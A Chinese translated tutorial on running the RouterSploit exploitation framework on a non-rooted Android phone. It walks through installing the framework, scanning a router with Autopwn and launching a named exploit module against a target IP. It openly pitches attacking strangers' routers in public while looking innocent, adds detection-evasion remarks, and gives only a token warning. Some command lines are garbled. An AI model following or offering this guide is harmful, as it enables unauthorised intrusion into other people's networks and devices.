漏洞扫描框架搭建(一款功能强大的漏洞利用框架)

漏洞扫描框架搭建(一款功能强大的漏洞利用框架)(1)

译者:WisFree

预估稿费:200RMB

投稿方式:发送邮件至linwei#360.cn,或登陆网页版在线投稿

RouterSploit跟著名的Metasploit差不多,RouterSploit同样是一款功能强大的漏洞利用框架。但RouterSploit主要针对的是路由器设备,它能够快速识别并利用路由器中存在的安全漏洞,本文将告诉大家如何一步一步地将RouterSploit安装到未root的Android设备上。

Kali可以帮助我们确定是否已经把绝大多数的依赖组件都安装好了,所以我们首先要为我们Android版本的Debian系统安装好所有的依赖组件,这样才能让系统正常运行。整个过程并不需要root权限或其他乱七八糟的权限,我们可以直接在Android手机上运行Linux Python工具来完成安装。需要注意的是,虽然不支持数据包注入,但RouterSploit这样的框架仍然是可以正常运行的。

在Android设备上使用攻击框架


Android环境的天然特性允许我们可以轻松地使用各种各样的无线攻击技术来检测、连接和入侵任何无线接入点。在入侵路由器时,我所使用的Android应用工具如下:

1. 为了探测和识别某个区域内的无线网络,我使用了Wigle Wifi Wardriving。它可以允许我们查看、记录并与区域内所有正在传输数据的无线网络进行交互。

2. 为了根据制造商、IP地址和可用服务来扫描和识别可攻击的目标网络,我使用了Fing Network Scanner,这款工具可以返回当前设备所连接的网络详细信息。

3. 一旦我们确定了需要测试/攻击的网络之后,RouterSploit的Autopwn扫描器便会向目标网络发送所有可用的Payload,我们所使用的测试设备是三星的最新款旗舰Galaxy S8,整个测试过程只需要一分钟不到的时间便可完成。

漏洞扫描框架搭建(一款功能强大的漏洞利用框架)(2)

以未root的Android手机作为攻击平台


在Android手机上使用强大的Linux攻击框架可以给我们提供另外一种攻击视角,就算别人知道你在用你的手机做一些“不正常”的事情,他们也不会对你有所怀疑,这就是利用Android手机来进行黑客攻击的一个非常大的好处。

人们常说,最好的武器就是你手中握有的武器,黑客工具也不例外。在配置好了我们的攻击环境之后,我们就可以在不需要任何特殊工具的情况下使用GNURoot Debian来审计任何路由器的安全性的。

很快你就会发现,当你拿着手机在马路上到处攻击别人的路由器时,别人还以为你在玩Pokémon Go呢!

我们需要准备什么?


我们需要的硬件设备只有Android智能手机。我使用的是一台三星Galaxy S8,因为随身携带一台拥有巨大的全曲面玻璃屏的手机可以随时提醒我生命到底有多么的脆弱,不过你也可以使用其他型号的Android手机,只要它支持GNURoot Debian就行。

第一步:安装GNURoot Debian

首先我们要安装GNURoot Debian,它可以帮助我们在一台未root的Android设备商运行Debian Linux系统。在Google Play应用商店中,搜索GNURoot Debian或点击【这个链接】直接下载。

漏洞扫描框架搭建(一款功能强大的漏洞利用框架)(3)

下载并安装这个App(60MB),首次运行时,工具会自动配置Debian环境:

漏洞扫描框架搭建(一款功能强大的漏洞利用框架)(4)

整个配置过程大概需要一两分钟,配置完成后你就会看到如下图所示的界面了:

漏洞扫描框架搭建(一款功能强大的漏洞利用框架)(5)

第二步:安装依赖组件

Android版的Debian Linux并不像Kali Linux,它没有预装任何特殊的依赖组件,所以我们还要自行安装很多东西。首先,我们要使用下列命令更新Debian系统:

1apt-get update

然后安装一些RouterSploit需要的工具:

12apt-get install sudosudo apt-get install git-core

git和sudo安装完成之后,我们就可以从GitHub库将RouterSploit克隆到本地,然后用sudo命令运行它了:

1sudo apt-get install python-dev python-pip libncurses5-dev git

第三步:安装RouterSploit

依赖组件安装完成之后,我们可以使用下列命令下载RouterSploit:

1git clone https://github.com/reverse-shell/routersploit

漏洞扫描框架搭建(一款功能强大的漏洞利用框架)(6)

第四步:首次运行RouterSploit

RouterSploit安装完成之后,我们需要运行它并确定它能够正常工作。使用下列命令定位到RouterSploit的主目录:

1cd routersploit

然后使用下列命令运行Python脚本:

1sudo python ./rsf.py

等几秒钟大概就可以加载完成了,然后你就能看到RouterSploit的启动画面了。RouterSploit的操作接口与Metasploit的十分相似,几个比较主要的操作命令如下:

1. use(模块)

2. set(设置)

3. show options(显示模块选项)

4. check(确定目标是否可攻击)

5. run(运行漏洞利用模块)

我们所要运行的模块是Autopwn,命令如下:

1use scanners/autopwn

该命令将会启动Autopwn扫描器,并开始对目标进行漏洞扫描。

第五步:设置攻击目标

安装了Wigle Wifi Wardriving之后,我们就可以使用自己的Android手机查看附近的无线网络了。当你获得了一个Wi-Fi网络的访问权或者Wi-Fi密码之后,我们就可以用Fing或其他网络扫描器扫描这个网络并搜索出所有与该路由器相连的设备。

当你定位了目标的IP地址之后,我们就可以在Autopwn中进行设置了。我们可以使用下列命令查看模块的可选操作项:

1show options

进入了Autopwn模块之后,我们可以在终端里使用下列命令来设置需要攻击的路由器IP地址:

1set target IP_address_here

漏洞扫描框架搭建(一款功能强大的漏洞利用框架)(7)

将上述命令中的IP_address_here替换成需要攻击的路由器IP地址,然后按下回车。如果你不确定是否设置成功的话,可以再次输入命令“show options”来进行确认。接下来,输入命令 “run”并按下回车来执行扫描模块。等待片刻,工具便会在终端输出扫描结果以及发现的安全漏洞。

漏洞扫描框架搭建(一款功能强大的漏洞利用框架)(8)

第六步:利用已发现的漏洞

扫描结束之后,输入“use”命令然后将Autopwn提供的漏洞利用模块复制进去。例如:

1use exploits/cameras/dlink/dcs_9301_9321_auth_bypass

跟之前一样设置目标的IP地址:

1set target IP_address_here

IP地址设置好之后,运行命令“check”来确定是否可以利用这个漏洞来攻击目标设备。如果可以利用的话,运行“run”命令来执行漏洞利用模块。

漏洞扫描框架搭建(一款功能强大的漏洞利用框架)(9)

警告


请同学们不要将其用于恶意目的,就算目标路由器完全没有任何的防御机制,你也不要对它做太过分的事情。值得注意的是,由于Autopwn扫描器的“动作”会比较大,所以很可能会被安全产品检测到,请你小心使用。

如果你对本文有任何疑问的话,请与作者联系。(Twitter或Instagram)

,

免责声明:本文仅代表文章作者的个人观点,与本站无关。其原创性、真实性以及文中陈述文字和内容未经本站证实,对本文以及其中全部或者部分内容文字的真实性、完整性和原创性本站不作任何保证或承诺,请读者仅作参考,并自行核实相关内容。文章投诉邮箱:anhduc.ph@yahoo.com

    分享
    投诉
    首页